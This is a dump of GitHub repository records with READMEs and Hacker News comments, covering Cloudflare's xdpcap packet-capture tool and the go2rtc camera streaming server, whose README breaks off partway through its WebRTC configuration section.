[Sign up](https://www.pluralith.com) for the alpha to get access!_\n\n![Subreddit subscribers](https://img.shields.io/reddit/subreddit-subscribers/pluralith?style=social)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cloudflare/xdpcap", "link": "https://github.com/cloudflare/xdpcap", "tags": [], "stars": 535, "description": "tcpdump like XDP packet capture", "lang": "Go", "repo_lang": "", "readme": "# xdpcap\n\nxdpcap is a tcpdump like tool for eXpress Data Path (XDP).\nIt can capture packets and actions / return codes from XDP programs,\nusing standard tcpdump / libpcap filter expressions.\n\n\n## Instrumentation\n\nXDP programs need to expose at least one hook point:\n\n```C\nstruct bpf_map_def xdpcap_hook = {\n\t.type = BPF_MAP_TYPE_PROG_ARRAY,\n\t.key_size = sizeof(int),\n\t.value_size = sizeof(int),\n\t.max_entries = 4, // The max value of XDP_* constants\n};\n```\n\nThis map must be [pinned inside a bpffs](https://facebookmicrosites.github.io/bpf/blog/2018/08/31/object-lifetime.html#bpffs).\n\n`hook.h` provides a convenience macro for declaring such maps:\n\n```\n#include \"hook.h\"\n\nstruct bpf_map_def xdpcap_hook = XDPCAP_HOOK();\n```\n\n`return XDP_*` statements should be modified to \"feed\" a hook:\n\n```C\n#include \"hook.h\"\n\nstruct bpf_map_def xdpcap_hook = XDPCAP_HOOK();\n\nint xdp_main(struct xdp_md *ctx) {\n\treturn xdpcap_exit(ctx, &xdpcap_hook, XDP_PASS);\n}\n```\n\nFor a full example, see [testdata/xdp_hook.c](testdata/xdp_hook.c).\n\nDepending on the granularity desired,\na program can expose multiple hook points,\nor a hook can be reused across programs by using the same underlying map.\n\nPackage [xdpcap](https://godoc.org/github.com/cloudflare/xdpcap) provides a wrapper for\ncreating and pinning the hook maps using the [newtools/ebpf](https://godoc.org/github.com/cilium/ebpf) loader.\n\n\n## Installation\n\n`go get -u github.com/cloudflare/xdpcap/cmd/xdpcap`\n\n\n## Usage\n\n* Capture packets to a pcap:\n`xdpcap /path/to/pinned/map dump.pcap \"tcp and port 80\"`\n\n* Display captured packets:\n`sudo xdpcap /path/to/pinned/map - \"tcp and port 80\" | sudo tcpdump -r -`\n\n\n## Limitations\n\n* filters run after the instrumented XDP program.\nIf the program modifies the packet,\nthe filter should match the modified packet,\nnot the original input packet.\n\n\n## Tests\n\n* `sudo -E $(which go) test`\n", "readme_type": "markdown", "hn_comments": "A little off topic: I love reading the cloud flare blog posts. They are always well written and super interesting. It looks like a very exciting place to work judging from what they get to work on.The tailcall and preconfigured entry points for all possible results seems excessive.I wonder if there could have been a cleaner way with an upstream patch instead.Maybe if you could add xdp filter at a given priority to make sure it runs first ?pcap files are all very well, but I want to run eBPF in the NIC and exfiltrate pcap to a user-space ring buffer. It doesn't seem like eBPF has access to the DMA bandwidth I think I need. Am I wrong?I think IPv4 ethertype should be 0x0800, not 0x8000 as depicted in the annotated flow chart. The picture is correct, the accompanying textbox is not.Fun fact, tcpdump is one of the BPF killer apps.eBPF extends the BPF with a more modern architecture (e.g. 
64 bit support) and being generalized so that it can support things like more fine grained security control in seccomp which limit what commands a userspace app can call.Xdpcap seems like a logical progression of this path.this looks close to https://github.com/Netronome/bpf-samples/tree/master/xdpdump .\nI'm a cloudflare user and i really like seeing this kind of things.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "AlexxIT/go2rtc", "link": "https://github.com/AlexxIT/go2rtc", "tags": ["ffmpeg", "hassio", "home-assistant", "ngrok", "rtmp", "rtsp", "webrtc", "streaming", "h264", "webcam-streaming", "hls", "mjpeg", "homekit", "h265", "rtp", "hacktoberfest", "http-flv", "media-server", "rtsp-server", "mp4"], "stars": 535, "description": "Ultimate camera streaming application with support RTSP, RTMP, HTTP-FLV, WebRTC, MSE, HLS, MJPEG, HomeKit, FFmpeg, etc.", "lang": "Go", "repo_lang": "", "readme": "# go2rtc\n\nUltimate camera streaming application with support RTSP, WebRTC, HomeKit, FFmpeg, RTMP, etc.\n\n![](assets/go2rtc.png)\n\n- zero-dependency and zero-config [small app](#go2rtc-binary) for all OS (Windows, macOS, Linux, ARM)\n- zero-delay for many supported protocols (lowest possible streaming latency)\n- streaming from [RTSP](#source-rtsp), [RTMP](#source-rtmp), [DVRIP](#source-dvrip), [HTTP](#source-http) (FLV/MJPEG/JPEG/TS), [USB Cameras](#source-ffmpeg-device) and [other sources](#module-streams)\n- streaming from any sources, supported by [FFmpeg](#source-ffmpeg)\n- streaming to [RTSP](#module-rtsp), [WebRTC](#module-webrtc), [MSE/MP4](#module-mp4), [HLS](#module-hls) or [MJPEG](#module-mjpeg)\n- first project in the World with support streaming from [HomeKit Cameras](#source-homekit)\n- first project in the World with support H265 for WebRTC in browser (Safari only, [read more](https://github.com/AlexxIT/Blog/issues/5))\n- on the fly transcoding for unsupported codecs via [FFmpeg](#source-ffmpeg)\n- play audio files and live streams on some cameras with [speaker](#stream-to-camera)\n- multi-source 2-way [codecs negotiation](#codecs-negotiation)\n - mixing tracks from different sources to single stream\n - auto match client supported codecs\n - [2-way audio](#two-way-audio) for some cameras\n- streaming from private networks via [Ngrok](#module-ngrok)\n- can be [integrated to](#module-api) any smart home platform or be used as [standalone app](#go2rtc-binary)\n\n**Inspired by:**\n\n- series of streaming projects from [@deepch](https://github.com/deepch)\n- [webrtc](https://github.com/pion/webrtc) go library and whole [@pion](https://github.com/pion) team\n- [rtsp-simple-server](https://github.com/aler9/rtsp-simple-server) idea from [@aler9](https://github.com/aler9)\n- [GStreamer](https://gstreamer.freedesktop.org/) framework pipeline idea\n- [MediaSoup](https://mediasoup.org/) framework routing idea\n- HomeKit Accessory Protocol from [@brutella](https://github.com/brutella/hap)\n\n---\n\n* [Fast start](#fast-start)\n * [go2rtc: Binary](#go2rtc-binary)\n * [go2rtc: Docker](#go2rtc-docker)\n * [go2rtc: Home Assistant Add-on](#go2rtc-home-assistant-add-on)\n * [go2rtc: Home Assistant Integration](#go2rtc-home-assistant-integration)\n* [Configuration](#configuration)\n * [Module: Streams](#module-streams)\n * [Two way audio](#two-way-audio)\n * [Source: RTSP](#source-rtsp)\n * [Source: RTMP](#source-rtmp)\n * [Source: HTTP](#source-http)\n * [Source: FFmpeg](#source-ffmpeg)\n * [Source: FFmpeg Device](#source-ffmpeg-device)\n * [Source: 
Exec](#source-exec)\n * [Source: Echo](#source-echo)\n * [Source: HomeKit](#source-homekit)\n * [Source: DVRIP](#source-dvrip)\n * [Source: Tapo](#source-tapo)\n * [Source: Ivideon](#source-ivideon)\n * [Source: Hass](#source-hass)\n * [Incoming sources](#incoming-sources)\n * [Stream to camera](#stream-to-camera)\n * [Module: API](#module-api)\n * [Module: RTSP](#module-rtsp)\n * [Module: WebRTC](#module-webrtc)\n * [Module: Ngrok](#module-ngrok)\n * [Module: Hass](#module-hass)\n * [Module: MP4](#module-mp4)\n * [Module: HLS](#module-hls)\n * [Module: MJPEG](#module-mjpeg)\n * [Module: Log](#module-log)\n* [Security](#security)\n* [Codecs filters](#codecs-filters)\n* [Codecs madness](#codecs-madness)\n* [Codecs negotiation](#codecs-negotiation)\n* [Projects using go2rtc](#projects-using-go2rtc)\n* [Camera experience](#cameras-experience)\n* [TIPS](#tips)\n* [FAQ](#faq)\n\n## Fast start\n\n1. Download [binary](#go2rtc-binary) or use [Docker](#go2rtc-docker) or Home Assistant [Add-on](#go2rtc-home-assistant-add-on) or [Integration](#go2rtc-home-assistant-integration)\n2. Open web interface: `http://localhost:1984/`\n\n**Optionally:**\n\n- add your [streams](#module-streams) to [config](#configuration) file\n- setup [external access](#module-webrtc) to webrtc\n\n**Developers:**\n\n- write your own [web interface](#module-api)\n- integrate [web api](#module-api) into your smart home platform\n\n### go2rtc: Binary\n\nDownload binary for your OS from [latest release](https://github.com/AlexxIT/go2rtc/releases/):\n\n- `go2rtc_win64.zip` - Windows 64-bit\n- `go2rtc_win32.zip` - Windows 32-bit\n- `go2rtc_linux_amd64` - Linux 64-bit\n- `go2rtc_linux_i386` - Linux 32-bit\n- `go2rtc_linux_arm64` - Linux ARM 64-bit (ex. Raspberry 64-bit OS)\n- `go2rtc_linux_arm` - Linux ARM 32-bit (ex. Raspberry 32-bit OS)\n- `go2rtc_linux_mipsel` - Linux MIPS (ex. [Xiaomi Gateway 3](https://github.com/AlexxIT/XiaomiGateway3))\n- `go2rtc_mac_amd64.zip` - Mac Intel 64-bit\n- `go2rtc_mac_arm64.zip` - Mac ARM 64-bit\n\nDon't forget to fix the rights `chmod +x go2rtc_xxx_xxx` on Linux and Mac.\n\n### go2rtc: Docker\n\nContainer [alexxit/go2rtc](https://hub.docker.com/r/alexxit/go2rtc) with support `amd64`, `386`, `arm64`, `arm`. This container is the same as [Home Assistant Add-on](#go2rtc-home-assistant-add-on), but can be used separately from Home Assistant. Container has preinstalled [FFmpeg](#source-ffmpeg), [Ngrok](#module-ngrok) and [Python](#source-echo).\n\n### go2rtc: Home Assistant Add-on\n\n[![](https://my.home-assistant.io/badges/supervisor_addon.svg)](https://my.home-assistant.io/redirect/supervisor_addon/?addon=a889bffc_go2rtc&repository_url=https%3A%2F%2Fgithub.com%2FAlexxIT%2Fhassio-addons)\n\n1. Install Add-On:\n - Settings > Add-ons > Plus > Repositories > Add `https://github.com/AlexxIT/hassio-addons`\n - go2rtc > Install > Start\n2. Setup [Integration](#module-hass)\n\n### go2rtc: Home Assistant Integration\n\n[WebRTC Camera](https://github.com/AlexxIT/WebRTC) custom component can be used on any [Home Assistant installation](https://www.home-assistant.io/installation/), including [HassWP](https://github.com/AlexxIT/HassWP) on Windows. It can automatically download and use the latest version of go2rtc. Or it can connect to an existing version of go2rtc. 
Addon installation in this case is optional.\n\n## Configuration\n\n- by default go2rtc will search `go2rtc.yaml` in the current work dirrectory\n- `api` server will start on default **1984 port** (TCP)\n- `rtsp` server will start on default **8554 port** (TCP)\n- `webrtc` will use port **8555** (TCP/UDP) for connections\n- `ffmpeg` will use default transcoding options\n\nConfiguration options and a complete list of settings can be found in [the wiki](https://github.com/AlexxIT/go2rtc/wiki/Configuration).\n\nAvailable modules:\n\n- [streams](#module-streams)\n- [api](#module-api) - HTTP API (important for WebRTC support)\n- [rtsp](#module-rtsp) - RTSP Server (important for FFmpeg support)\n- [webrtc](#module-webrtc) - WebRTC Server\n- [mp4](#module-mp4) - MSE, MP4 stream and MP4 shapshot Server\n- [hls](#module-hls) - HLS TS or fMP4 stream Server\n- [mjpeg](#module-mjpeg) - MJPEG Server\n- [ffmpeg](#source-ffmpeg) - FFmpeg integration\n- [ngrok](#module-ngrok) - Ngrok integration (external access for private network)\n- [hass](#module-hass) - Home Assistant integration\n- [log](#module-log) - logs config\n\n### Module: Streams\n\n**go2rtc** support different stream source types. You can config one or multiple links of any type as stream source.\n\nAvailable source types:\n\n- [rtsp](#source-rtsp) - `RTSP` and `RTSPS` cameras with [two way audio](#two-way-audio) support\n- [rtmp](#source-rtmp) - `RTMP` streams\n- [http](#source-http) - `HTTP-FLV`, `MPEG TS`, `JPEG` (snapshots), `MJPEG` streams \n- [ffmpeg](#source-ffmpeg) - FFmpeg integration (`HLS`, `files` and many others)\n- [ffmpeg:device](#source-ffmpeg-device) - local USB Camera or Webcam\n- [exec](#source-exec) - advanced FFmpeg and GStreamer integration\n- [echo](#source-echo) - get stream link from bash or python\n- [homekit](#source-homekit) - streaming from HomeKit Camera\n- [dvrip](#source-dvrip) - streaming from DVR-IP NVR\n- [tapo](#source-tapo) - TP-Link Tapo cameras with [two way audio](#two-way-audio) support\n- [ivideon](#source-ivideon) - public cameras from [Ivideon](https://tv.ivideon.com/) service\n- [hass](#source-hass) - Home Assistant integration\n\nRead more about [incoming sources](#incoming-sources)\n\n#### Two way audio\n\nSupported for sources:\n\n- RTSP cameras with [ONVIF Profile T](https://www.onvif.org/specs/stream/ONVIF-Streaming-Spec.pdf) (back channel connection)\n- TP-Link Tapo cameras\n\nTwo way audio can be used in browser with [WebRTC](#module-webrtc) technology. The browser will give access to the microphone only for HTTPS sites ([read more](https://stackoverflow.com/questions/52759992/how-to-access-camera-and-microphone-in-chrome-without-https)).\n\ngo2rtc also support [play audio](#stream-to-camera) files and live streams on this cameras.\n\n#### Source: RTSP\n\n```yaml\nstreams:\n sonoff_camera: rtsp://rtsp:12345678@192.168.1.123/av_stream/ch0\n dahua_camera:\n - rtsp://admin:password@192.168.1.123/cam/realmonitor?channel=1&subtype=0&unicast=true&proto=Onvif\n - rtsp://admin:password@192.168.1.123/cam/realmonitor?channel=1&subtype=1\n amcrest_doorbell:\n - rtsp://username:password@192.168.1.123:554/cam/realmonitor?channel=1&subtype=0#backchannel=0\n unify_camera: rtspx://192.168.1.123:7441/fD6ouM72bWoFijxK\n glichy_camera: ffmpeg:rstp://username:password@192.168.1.123/live/ch00_1 \n```\n\n**Recommendations**\n\n- **Amcrest Doorbell** users may want to disable two way audio, because with an active stream you won't have a call button working. 
You need to add `#backchannel=0` to the end of your RTSP link in YAML config file\n- **Dahua Doorbell** users may want to change backchannel [audio codec](https://github.com/AlexxIT/go2rtc/issues/52)\n- **Unify** users may want to disable HTTPS verification. Use `rtspx://` prefix instead of `rtsps://`. And don't use `?enableSrtp` [suffix](https://github.com/AlexxIT/go2rtc/issues/81)\n- **TP-Link Tapo** users may skip login and password, because go2rtc support login [without them](https://drmnsamoliu.github.io/video.html)\n- If your camera has two RTSP links - you can add both of them as sources. This is useful when streams has different codecs, as example AAC audio with main stream and PCMU/PCMA audio with second stream\n- If the stream from your camera is glitchy, try using [ffmpeg source](#source-ffmpeg). It will not add CPU load if you won't use transcoding\n- If the stream from your camera is very glitchy, try to use transcoding with [ffmpeg source](#source-ffmpeg)\n\n#### Source: RTMP\n\nYou can get stream from RTMP server, for example [Frigate](https://docs.frigate.video/configuration/rtmp).\n\n```yaml\nstreams:\n rtmp_stream: rtmp://192.168.1.123/live/camera1\n```\n\n#### Source: HTTP\n\nSupport Content-Type:\n\n- **HTTP-FLV** (`video/x-flv`) - same as RTMP, but over HTTP\n- **HTTP-JPEG** (`image/jpeg`) - camera snapshot link, can be converted by go2rtc to MJPEG stream\n- **HTTP-MJPEG** (`multipart/x`) - simple MJPEG stream over HTTP\n- **MPEG TS** (`video/mpeg`) - legacy [streaming format](https://en.wikipedia.org/wiki/MPEG_transport_stream)\n\n```yaml\nstreams:\n # [HTTP-FLV] stream in video/x-flv format\n http_flv: http://192.168.1.123:20880/api/camera/stream/780900131155/657617\n \n # [JPEG] snapshots from Dahua camera, will be converted to MJPEG stream\n dahua_snap: http://admin:password@192.168.1.123/cgi-bin/snapshot.cgi?channel=1\n\n # [MJPEG] stream will be proxied without modification\n http_mjpeg: https://mjpeg.sanford.io/count.mjpeg\n```\n\n**PS.** Dahua camera has bug: if you select MJPEG codec for RTSP second stream - snapshot won't work.\n\n#### Source: FFmpeg\n\nYou can get any stream or file or device via FFmpeg and push it to go2rtc. The app will automatically start FFmpeg with the proper arguments when someone starts watching the stream.\n\n- FFmpeg preistalled for **Docker** and **Hass Add-on** users\n- **Hass Add-on** users can target files from [/media](https://www.home-assistant.io/more-info/local-media/setup-media/) folder\n\nFormat: `ffmpeg:{input}#{param1}#{param2}#{param3}`. 
Examples:\n\n```yaml\nstreams:\n # [FILE] all tracks will be copied without transcoding codecs\n file1: ffmpeg:/media/BigBuckBunny.mp4\n\n # [FILE] video will be transcoded to H264, audio will be skipped\n file2: ffmpeg:/media/BigBuckBunny.mp4#video=h264\n\n # [FILE] video will be copied, audio will be transcoded to pcmu\n file3: ffmpeg:/media/BigBuckBunny.mp4#video=copy#audio=pcmu\n\n # [HLS] video will be copied, audio will be skipped\n hls: ffmpeg:https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear5/prog_index.m3u8#video=copy\n\n # [MJPEG] video will be transcoded to H264\n mjpeg: ffmpeg:http://185.97.122.128/cgi-bin/faststream.jpg#video=h264\n\n # [RTSP] video with rotation, should be transcoded, so select H264\n rotate: ffmpeg:rtsp://rtsp:12345678@192.168.1.123/av_stream/ch0#video=h264#rotate=90\n```\n\nAll trascoding formats has [built-in templates](https://github.com/AlexxIT/go2rtc/blob/master/cmd/ffmpeg/ffmpeg.go): `h264`, `h265`, `opus`, `pcmu`, `pcmu/16000`, `pcmu/48000`, `pcma`, `pcma/16000`, `pcma/48000`, `aac`, `aac/16000`.\n\nBut you can override them via YAML config. You can also add your own formats to config and use them with source params.\n\n```yaml\nffmpeg:\n bin: ffmpeg # path to ffmpeg binary\n h264: \"-codec:v libx264 -g:v 30 -preset:v superfast -tune:v zerolatency -profile:v main -level:v 4.1\"\n mycodec: \"-any args that support ffmpeg...\"\n myinput: \"-fflags nobuffer -flags low_delay -timeout 5000000 -i {input}\"\n```\n\n- You can use `video` and `audio` params multiple times (ex. `#video=copy#audio=copy#audio=pcmu`)\n- You can use go2rtc stream name as ffmpeg input (ex. `ffmpeg:camera1#video=h264`)\n- You can use `rotate` params with `90`, `180`, `270` or `-90` values, important with transcoding (ex. `#video=h264#rotate=90`)\n- You can use `width` and/or `height` params, important with transcoding (ex. `#video=h264#width=1280`)\n- You can use `raw` param for any additional FFmpeg arguments (ex. `#raw=-vf transpose=1`)\n- You can use `input` param to override default input template (ex. `#input=rtsp/udp` will change RTSP transport from TCP to UDP+TCP)\n - You can use raw input value (ex. `#input=-timeout 5000000 -i {input}`)\n - You can add your own input templates\n\nRead more about encoding [hardware acceleration](https://github.com/AlexxIT/go2rtc/wiki/Hardware-acceleration).\n\n#### Source: FFmpeg Device\n\nYou can get video from any USB-camera or Webcam as RTSP or WebRTC stream. This is part of FFmpeg integration.\n\n- check available devices in Web interface\n- `resolution` and `framerate` must be supported by your camera!\n- for Linux supported only video for now\n- for macOS you can stream Facetime camera or whole Desktop!\n- for macOS important to set right framerate\n\n```yaml\nstreams:\n linux_usbcam: ffmpeg:device?video=0&resolution=1280x720#video=h264\n windows_webcam: ffmpeg:device?video=0#video=h264\n macos_facetime: ffmpeg:device?video=0&audio=1&resolution=1280x720&framerate=30#video=h264#audio=pcma\n```\n\n#### Source: Exec\n\nFFmpeg source just a shortcut to exec source. You can get any stream or file or device via FFmpeg or GStreamer and push it to go2rtc via RTSP protocol: \n\n```yaml\nstreams:\n stream1: exec:ffmpeg -hide_banner -re -stream_loop -1 -i /media/BigBuckBunny.mp4 -c copy -rtsp_transport tcp -f rtsp {output}\n```\n\n#### Source: Echo\n\nSome sources may have a dynamic link. And you will need to get it using a bash or python script. Your script should echo a link to the source. 
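For illustration only, here is a hedged Go sketch of such a helper; the lookup endpoint is purely hypothetical, and the only contract is that the command prints the resulting link to stdout:

```go
// echo_link.go - hypothetical helper for an "echo:" source.
// It asks an imaginary local service for the camera's current stream URL
// and prints that URL to stdout, which is all go2rtc reads.
package main

import (
	"fmt"
	"io"
	"log"
	"net/http"
	"strings"
)

func main() {
	// Placeholder endpoint - replace with whatever returns your dynamic link.
	resp, err := http.Get("http://127.0.0.1:8080/current-stream-url")
	if err != nil {
		log.Fatal(err)
	}
	defer resp.Body.Close()

	body, err := io.ReadAll(resp.Body)
	if err != nil {
		log.Fatal(err)
	}

	// Print the link and nothing else, e.g. rtsp://... or ffmpeg:...
	fmt.Print(strings.TrimSpace(string(body)))
}
```

If a Go toolchain is available, it could plausibly be wired up as `echo:go run /config/echo_link.go` (untested here), in the same way as the python example below. The echoed link may point at any of the source types already covered: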
RTSP, FFmpeg or any of the [supported sources](#module-streams).\n\n**Docker** and **Hass Add-on** users has preinstalled `python3`, `curl`, `jq`.\n\nCheck examples in [wiki](https://github.com/AlexxIT/go2rtc/wiki/Source-Echo-examples).\n\n```yaml\nstreams:\n apple_hls: echo:python3 hls.py https://developer.apple.com/streaming/examples/basic-stream-osx-ios5.html\n```\n\n#### Source: HomeKit\n\n**Important:**\n\n- You can use HomeKit Cameras **without Apple devices** (iPhone, iPad, etc.), it's just a yet another protocol\n- HomeKit device can be paired with only one ecosystem. So, if you have paired it to an iPhone (Apple Home) - you can't pair it with Home Assistant or go2rtc. Or if you have paired it to go2rtc - you can't pair it with iPhone\n- HomeKit device should be in same network with working [mDNS](https://en.wikipedia.org/wiki/Multicast_DNS) between device and go2rtc\n\ngo2rtc support import paired HomeKit devices from [Home Assistant](#source-hass). So you can use HomeKit camera with Hass and go2rtc simultaneously. If you using Hass, I recommend pairing devices with it, it will give you more options.\n\nYou can pair device with go2rtc on the HomeKit page. If you can't see your devices - reload the page. Also try reboot your HomeKit device (power off). If you still can't see it - you have a problems with mDNS.\n\nIf you see a device but it does not have a pair button - it is paired to some ecosystem (Apple Home, Home Assistant, HomeBridge etc). You need to delete device from that ecosystem, and it will be available for pairing. If you cannot unpair device, you will have to reset it.\n\n**Important:**\n\n- HomeKit audio uses very non-standard **AAC-ELD** codec with very non-standard params and specification violation\n- Audio can be transcoded by [ffmpeg](#source-ffmpeg) source with `#async` option\n- Audio can be played by `ffplay` with `-use_wallclock_as_timestamps 1 -async 1` options\n- Audio can't be played in `VLC` and probably any other player\n\nRecommended settings for using HomeKit Camera with WebRTC, MSE, MP4, RTSP:\n\n```\nstreams:\n aqara_g3:\n - hass:Camera-Hub-G3-AB12\n - ffmpeg:aqara_g3#audio=aac#audio=opus#async\n```\n\nRTSP link with \"normal\" audio for any player: `rtsp://192.168.1.123:8554/aqara_g3?video&audio=aac`\n\n**This source is in active development!** Tested only with [Aqara Camera Hub G3](https://www.aqara.com/eu/product/camera-hub-g3) (both EU and CN versions).\n\n#### Source: DVRIP\n\nOther names: DVR-IP, NetSurveillance, Sofia protocol (NETsurveillance ActiveX plugin XMeye SDK).\n\n- you can skip `username`, `password`, `port`, `channel` and `subtype` if they are default\n- setup separate streams for different channels\n- use `subtype=0` for Main stream, and `subtype=1` for Extra1 stream\n- only the TCP protocol is supported\n\n```yaml\nstreams:\n camera1: dvrip://username:password@192.168.1.123:34567?channel=0&subtype=0\n```\n\n#### Source: Tapo\n\n[TP-Link Tapo](https://www.tapo.com/) proprietary camera protocol with **two way audio** support.\n\n- stream quality is the same as [RTSP protocol](https://www.tapo.com/en/faq/34/)\n- use the **cloud password**, this is not the RTSP password! 
you do not need to add a login!\n- you can also use UPPERCASE MD5 hash from your cloud password with `admin` username\n\n```yaml\nstreams:\n # cloud password without username\n camera1: tapo://cloud-password@192.168.1.123\n # admin username and UPPERCASE MD5 cloud-password hash\n camera2: tapo://admin:MD5-PASSWORD-HASH@192.168.1.123\n```\n\n#### Source: Ivideon\n\nSupport public cameras from service [Ivideon](https://tv.ivideon.com/).\n\n```yaml\nstreams:\n quailcam: ivideon:100-tu5dkUPct39cTp9oNEN2B6/0\n```\n\n#### Source: Hass\n\nSupport import camera links from [Home Assistant](https://www.home-assistant.io/) config files:\n\n- support [Generic Camera](https://www.home-assistant.io/integrations/generic/), setup via GUI\n- support [HomeKit Camera](https://www.home-assistant.io/integrations/homekit_controller/)\n\n```yaml\nhass:\n config: \"/config\" # skip this setting if you Hass Add-on user\n\nstreams:\n generic_camera: hass:Camera1 # Settings > Integrations > Integration Name\n aqara_g3: hass:Camera-Hub-G3-AB12\n```\n\nMore cameras, like [Tuya](https://www.home-assistant.io/integrations/tuya/), [ONVIF](https://www.home-assistant.io/integrations/onvif/), and possibly others can also be imported by using [this method](https://github.com/felipecrs/hass-expose-camera-stream-source#importing-home-assistant-cameras-to-go2rtc-andor-frigate).\n\n### Incoming sources\n\nBy default, go2rtc establishes a connection to the source when any client requests it. Go2rtc drops the connection to the source when it has no clients left.\n\n- Go2rtc also can accepts incoming sources in [RTSP](#source-rtsp) and [HTTP](#source-http) formats\n- Go2rtc won't stop such a source if it has no clients\n- You can push data only to existing stream (create stream with empty source in config)\n- You can push multiple incoming sources to same stream\n- You can push data to non empty stream, so it will have additional codecs inside\n\n**Examples**\n\n- RTSP with any codec\n ```yaml\n ffmpeg -re -i BigBuckBunny.mp4 -c copy -rtsp_transport tcp -f rtsp rtsp://localhost:8554/camera1\n ```\n- HTTP-MJPEG with MJPEG codec\n ```yaml\n ffmpeg -re -i BigBuckBunny.mp4 -c mjpeg -f mpjpeg http://localhost:1984/api/stream.mjpeg?dst=camera1\n ```\n- HTTP-FLV with H264, AAC codecs\n ```yaml\n ffmpeg -re -i BigBuckBunny.mp4 -c copy -f flv http://localhost:1984/api/stream.flv?dst=camera1\n ```\n- MPEG TS with H264 codec\n ```yaml\n ffmpeg -re -i BigBuckBunny.mp4 -c copy -f flv http://localhost:1984/api/stream.ts?dst=camera1\n ```\n\n#### Stream to camera\n\ngo2rtc support play audio files (ex. music or [TTS](https://www.home-assistant.io/integrations/#text-to-speech)) and live streams (ex. radio) on cameras with [two way audio](#two-way-audio) support.\n\nAPI example:\n\n```\nPOST http://localhost:1984/api/streams?dst=camera1&src=ffmpeg:http://example.com/song.mp3#audio=pcma#input=file\n```\n\n- you can stream: local files, web files, live streams or any format, supported by FFmpeg \n- you should use [ffmpeg source](#source-ffmpeg) for transcoding audio to codec, that your camera supports\n- you can check camera codecs on the go2rtc WebUI info page when the stream is active\n- some cameras support only low quality `PCMA/8000` codec (ex. [Tapo](#source-tapo))\n- it is recommended to choose higher quality formats if your camera supports them (ex. 
`PCMA/48000` for some Dahua cameras)\n- if you play files over http-link, you need to add `#input=file` params for transcoding, so file will be transcoded and played in real time\n- if you play live streams, you should skip `#input` param, because it is already in real time\n- you can stop active playback by calling the API with the empty `src` parameter\n- you will see one active producer and one active consumer in go2rtc WebUI info page during streaming\n\n### Module: API\n\nThe HTTP API is the main part for interacting with the application. Default address: `http://127.0.0.1:1984/`.\n\ngo2rtc has its own JS video player (`video-rtc.js`) with:\n\n- support technologies:\n - WebRTC over UDP or TCP\n - MSE or MP4 or MJPEG over WebSocket \n- automatic selection best technology according on:\n - codecs inside your stream\n - current browser capabilities\n - current network configuration\n- automatic stop stream while browser or page not active\n- automatic stop stream while player not inside page viewport\n- automatic reconnection\n\nTechnology selection based on priorities:\n\n1. Video and Audio better than just Video\n2. H265 better than H264\n3. WebRTC better than MSE, than MP4, than MJPEG\n\ngo2rtc has simple HTML page (`stream.html`) with support params in URL:\n\n- multiple streams on page `src=camera1&src=camera2...`\n- stream technology autoselection `mode=webrtc,mse,mp4,mjpeg`\n- stream technology comparison `src=camera1&mode=webrtc&mode=mse&mode=mp4`\n- player width setting in pixels `width=320px` or percents `width=50%`\n\n**Module config**\n\n- you can disable HTTP API with `listen: \"\"` and use, for example, only RTSP client/server protocol\n- you can enable HTTP API only on localhost with `listen: \"127.0.0.1:1984\"` setting\n- you can change API `base_path` and host go2rtc on your main app webserver suburl\n- all files from `static_dir` hosted on root path: `/`\n\n```yaml\napi:\n listen: \":1984\" # default \":1984\", HTTP API port (\"\" - disabled)\n username: \"admin\" # default \"\", Basic auth for WebUI\n password: \"pass\" # default \"\", Basic auth for WebUI\n base_path: \"/rtc\" # default \"\", API prefix for serve on suburl (/api => /rtc/api)\n static_dir: \"www\" # default \"\", folder for static files (custom web interface)\n origin: \"*\" # default \"\", allow CORS requests (only * supported)\n```\n\n**PS:**\n\n- go2rtc doesn't provide HTTPS. Use [Nginx](https://nginx.org/) or [Ngrok](#module-ngrok) or [Home Assistant Add-on](#go2rtc-home-assistant-add-on) for this tasks\n- MJPEG over WebSocket plays better than native MJPEG because Chrome [bug](https://bugs.chromium.org/p/chromium/issues/detail?id=527446)\n- MP4 over WebSocket was created only for Apple iOS because it doesn't support MSE and native MP4\n\n### Module: RTSP\n\nYou can get any stream as RTSP-stream: `rtsp://192.168.1.123:8554/{stream_name}`\n\nYou can enable external password protection for your RTSP streams. Password protection always disabled for localhost calls (ex. FFmpeg or Hass on same server).\n\n```yaml\nrtsp:\n listen: \":8554\" # RTSP Server TCP port, default - 8554\n username: \"admin\" # optional, default - disabled\n password: \"pass\" # optional, default - disabled\n default_query: \"video&audio\" # optional, default codecs filters \n```\n\nBy default go2rtc provide RTSP-stream with only one first video and only one first audio. 
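As a side note on the HTTP API above, here is a hedged Go sketch of the Stream-to-camera call shown earlier; the host, stream name and MP3 URL are simply the example values from that section:

```go
// play_audio.go - hedged sketch of the documented POST /api/streams call.
// It asks go2rtc to play an MP3 (transcoded to PCMA) on a two way audio camera.
package main

import (
	"log"
	"net/http"
	"net/url"
)

func main() {
	q := url.Values{}
	q.Set("dst", "camera1") // existing stream name from go2rtc.yaml
	// Same ffmpeg expression as the README example; url.Values
	// percent-encodes the '#' characters for use in a query string.
	q.Set("src", "ffmpeg:http://example.com/song.mp3#audio=pcma#input=file")

	resp, err := http.Post("http://localhost:1984/api/streams?"+q.Encode(), "", nil)
	if err != nil {
		log.Fatal(err)
	}
	defer resp.Body.Close()
	log.Println("go2rtc responded:", resp.Status)
}
```

Calling the same endpoint again with an empty `src` stops playback, as noted in that section. Back to the RTSP module's default track selection: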
You can change it with the `default_query` setting:\n\n- `default_query: \"mp4\"` - MP4 compatible codecs (H264, H265, AAC)\n- `default_query: \"video=all&audio=all\"` - all tracks from all source (not all players can handle this)\n- `default_query: \"video=h264,h265\"` - only one video track (H264 or H265)\n- `default_query: \"video&audio=all\"` - only one first any video and all audio as separate tracks\n\nRead more about [codecs filters](#codecs-filters).\n\n### Module: WebRTC\n\nWebRTC usually works without problems in the local network. But external access may require additional settings. It depends on what type of Internet do you have.\n\n- by default, WebRTC uses both TCP and UDP on port 8555 for connections\n- you can use this port for external access\n- you can change the port in YAML config:\n\n```yaml\nwebrtc:\n listen: \":8555\" # address of your local server and port (TCP/UDP)\n```\n\n**Static public IP**\n\n- forward the port 8555 on your router (you can use same 8555 port or any other as external port)\n- add your external IP-address and external port to YAML config\n\n```yaml\nwebrtc:\n candidates:\n - 216.58.210.174:8555 # if you have static public IP-address\n```\n\n**Dynamic public IP**\n\n- forward the port 8555 on your router (you 